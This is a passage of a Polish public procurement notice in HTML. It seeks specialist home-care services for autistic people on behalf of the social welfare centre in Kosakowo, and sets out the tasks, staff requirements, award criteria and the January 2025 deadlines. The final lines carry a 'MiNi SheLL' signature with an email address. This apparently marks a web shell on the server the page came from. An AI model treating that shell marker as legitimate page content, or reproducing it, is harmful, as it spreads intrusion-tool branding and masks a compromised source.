class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Specjalistyczne usługi opiekuńcze dla osób autystycznych: dorosłych oraz dzieci (1 osoba – łącznie 60 godzin)<br/>1. Przedmiotem zamówienia jest: usługa. Przez specjalistyczne usługi opiekuńcze dla osób dorosłych i dzieci z autyzmem z<br/>zadań zleconych gminie rozumie się świadczenie usług na rzecz podopiecznych GOPS w Kosakowie, w miejscu ich<br/>zamieszkania, polegających w szczególności na:<br/>a) uczeniu i rozwijaniu umiejętności niezbędnych do samodzielnego życia, w tym zwłaszcza: • kształtowanie umiejętności<br/>zaspokajania podstawowych potrzeb życiowych i umiejętności społecznego funkcjonowania, motywowanie do aktywności,<br/>leczenia i rehabilitacji, prowadzenie treningów umiejętności samoobsługi i umiejętności społecznych oraz wspieranie, także<br/>w formie asystowania w codziennych czynnościach życiowych, w szczególności takich jak:<br/>samoobsługa, zwłaszcza wykonywanie czynności gospodarczych  i porządkowych, w tym umiejętność utrzymania i<br/>prowadzenia domu,<br/> dbałość o higienę i wygląd,<br/> utrzymywanie kontaktów z domownikami, rówieśnikami, w miejscu nauki oraz ze społecznością lokalną,<br/>wspólneorganizowanie i spędzanie czasu wolnego,<br/> korzystanie z usług różnych instytucji,<br/>• interwencje i pomoc w życiu w rodzinie, w tym:<br/> pomoc w radzeniu sobie w sytuacjach kryzysowych - poradnictwo specjalistyczne, interwencje<br/>kryzysowe,wsparciepsychologiczne, rozmowy terapeutyczne, ułatwienie dostępu do edukacji i kultury,<br/> doradztwo, koordynacja działań innych służb na rzecz rodziny, której członkiem jest osoba uzyskująca pomoc<br/>wformiespecjalistycznych usług, kształtowanie pozytywnych relacji osoby wspieranej z osobami bliskimi, współpraca z<br/>rodziną - kształtowanie odpowiednich postaw wobec osoby chorującej, niepełnosprawnej, • pomoc w załatwianiu spraw<br/>urzędowych dla opiekunów dziecka, w tym:<br/> w uzyskaniu świadczeń socjalnych, emerytalno-rentowych,<br/> w wypełnieniu dokumentów urzędowych,<br/>b) pielęgnacja - jako wspieranie procesu leczenia, w tym:<br/>• pomoc w dostępie do świadczeń zdrowotnych,<br/>• pomoc opiekunom dziecka w uzgadnianiu i pilnowaniu terminów wizyt lekarskich, badań diagnostycznych,<br/>• pomoc opiekunom dziecka w wykupywaniu lub zamawianiu leków w aptece,<br/>• pomoc opiekunom dziecka w pilnowaniu przyjmowania leków oraz obserwowaniu ewentualnych skutków<br/>ubocznychichstosowania,<br/>• pomoc opiekunom dziecka w dotarciu do placówek służby zdrowia,<br/>• pomoc opiekunom dziecka w dotarciu do placówek rehabilitacyjnych dla podopiecznych.<br/>c) rehabilitacja fizyczna i usprawnianie zaburzonych funkcji organizmu w zakresie nieobjętym przepisami ustawy z dnia 27<br/>sierpnia 2004 r. o świadczeniach opieki zdrowotnej finansowanych ze środków publicznych (Dz. U. z 2020 r., poz. 1398, z<br/>późn. zm.):<br/>• zgodnie z zaleceniami lekarskimi lub specjalisty z zakresu rehabilitacji ruchowej lub fizjoterapii, terapeutycznegozmierzającego<br/>do wielostronnej aktywizacji osoby korzystającej ze specjalistycznych usług; d) pomoc<br/>mieszkaniowa opiekunom dziecka, w tym:<br/>• w uzyskaniu mieszkania, negocjowaniu i wnoszeniu opłat,<br/>• w organizacji drobnych remontów, adaptacji, napraw, likwidacji barier architektonicznych,<br/>e) zapewnienie dzieciom i młodzieży z zaburzeniami psychicznymi dostępu do zajęć rehabilitacyjnych i<br/>rewalidacyjnowychowawczych, w wyjątkowych przypadkach, jeżeli nie mają możliwości uzyskania dostępu do zajęć, o<br/>których mowa w art. 7 ustawy z dnia 19 sierpnia 1994r. o ochronie zdrowia psychicznego (Dz. U. z 2020 poz. 685.).<br/>2. Realizacja zamówienie wymaga od Wykonawcy, dysponowania zapleczem personalnym, spełniającym następujące<br/>wymagania:<br/>a) Personel posiadający jedną z niżej wymienionych kwalifikacji do wykonywania zawodu:<br/>• Opiekunki środowiskowej,<br/>• Fizjoterapeuty,<br/>• Asystenta osoby niepełnosprawnej,<br/>• Terapeuty zajęciowego,<br/>• Specjalisty w zakresie rehabilitacji medycznej,<br/>• Pielęgniarki,<br/>• Pedagoga,<br/>• Logopedy, psychologa,• Pracownika socjalnego.<br/>b) Personel świadczący specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi posiadający minimum<br/>półroczny staż pracy w jednej z następujących jednostek:<br/>• w jednostce świadczącej specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi,• zakładzie rehabilitacji,<br/>• ośrodku terapeutyczno – edukacyjno – wychowawczym,<br/>• placówce terapii lub placówce oświatowej dla osób z zaburzeniami psychicznymi,<br/>• jednostce organizacyjnej pomocy społecznej dla osób z zaburzeniami psychicznymi,<br/>• szpitalu psychiatrycznym,<br/>• innej jednostce niż wymienione w pkt a-f, świadczące specjalistyczne usługi opiekuńcze dla osób z<br/>zaburzeniamipsychicznymi.<br/>c) Personel posiada przeszkolenie i doświadczenie w jednej z niżej wymienionych dziedzin:<br/>• prowadzenia treningów samoobsługi;<br/>• wspomagania procesu uczenia się;<br/>• prowadzenia treningów zachowań społecznych;<br/>• usprawniania zaburzonych funkcji organizmu;<br/>• wspomagania procesu terapeutycznego poza miejscem zamieszkania,• kształtowania motywacji do akceptowanych<br/>przezotoczenie zachowań, kształtowanie nawyków celowej aktywności </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85000000-9 - Usługi w zakresie zdrowia i opieki społecznej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym<br/>w art. 454-455 p.z.p. oraz wskazanym we Projektowane postanowienia umowy, załącznik nr 5 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-01-29 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Przedmiotowe postępowanie prowadzone jest przy użyciu środków komunikacji elektronicznej. Składanie ofert następuje za pośrednictwem platformy zakupowej dostępnej pod adresem internetowym: https://wladyslawowo.ezamawiajacy.pl/pn/wladyslawowo/demand/183486/notice/public/details</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-01-29 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-02-27</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zgodnie z art. 7 ust. 1 ustawy z postępowania o udzielenie zamówienia publicznego zamawiający wyklucza : a) wykonawcę<br/>oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu<br/>765/2006irozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o<br/>zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>b) wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z 1 marca 2018<br/>r.oprzeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu jest osoba wymieniona w wykazach określonych w<br/>rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od<br/>24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o<br/>zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>c) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37<br/>ustawyz29września 1994 r. o rachunkowości jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006<br/>i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od 24 lutego 2022 r., o ile został<br/>wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art.<br/>1 pkt 3.<br/>d) Wykluczenie Wykonawcy następuje zgodnie z art. 111 p.z.p

Creat By MiNi SheLL
Email: jattceo@gmail.com